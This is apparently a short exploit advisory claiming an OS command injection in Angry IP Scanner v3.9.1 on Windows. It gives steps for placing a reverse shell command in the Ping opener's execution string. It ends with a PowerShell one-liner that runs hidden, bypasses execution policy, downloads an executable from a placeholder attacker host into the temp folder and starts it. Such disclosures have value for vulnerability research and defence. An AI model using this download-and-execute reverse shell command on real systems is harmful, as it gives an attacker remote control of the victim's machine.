Exploit Title: Angry IP Scanner v3.9.1 - OS Command Injection
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 18.09.2023
Vendor Homepage: https://angryip.org
Software Link: https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exe
Tested Version: v3.9.1 (latest)
Tested on: Windows 2019 Server 64bit
Steps to Reproduce
- Open Angry IP Scanner.
- Click on the Start button.
- Go to Commands > Edit Openers.
- Select Ping and enter your reverse shell command into the Execution string box, then click OK.
- Now go to Commands > Open > Ping.
- Your reverse shell should now be active, connecting to your listener.
Example of Reverse Shell Command
To set up a reverse shell in the Execution string box, you can use the following command:
```batch powershell -NoP -NonI -W Hidden -Exec Bypass -Command “Invoke-WebRequest -Uri http://attacker_ip:port -OutFile %TEMP%\shell.exe; Start-Process %TEMP%\shell.exe”